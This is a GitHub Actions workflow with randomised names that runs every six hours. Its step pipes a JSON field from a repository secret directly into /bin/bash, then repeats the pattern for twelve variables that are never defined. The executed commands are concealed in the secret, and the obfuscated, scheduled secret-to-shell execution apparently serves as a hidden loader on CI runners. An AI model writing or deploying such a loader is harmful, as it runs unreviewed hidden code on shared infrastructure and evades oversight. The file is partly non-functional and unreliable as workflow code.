name: yuchangkan3910
on:
  workflow_dispatch:
  schedule:
    - cron: '4 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuchangkan3910
        env:
          emrn1: ${{ secrets.emrn1 }}
        run: |
          echo $emrn1 | jq -r .odww87 | /bin/bash
          echo $b5 | jq -r .mbzd0334 | /bin/bash
          echo $fhxa301 | jq -r .zmei658 | /bin/bash
          echo $zzb614 | jq -r .rd747 | /bin/bash
          echo $ykyn06312 | jq -r .hmrv041 | /bin/bash
          echo $eh775 | jq -r .aqokz435 | /bin/bash
          echo $pvwm3985 | jq -r .d234 | /bin/bash
          echo $wymvf930 | jq -r .ityz47 | /bin/bash
          echo $dc2 | jq -r .v513 | /bin/bash
          echo $k25 | jq -r .mutns48324 | /bin/bash
          echo $y9 | jq -r .nhn26 | /bin/bash
          echo $jd8 | jq -r .axjjc2490 | /bin/bash
          echo $c936 | jq -r .svn6356 | /bin/bash

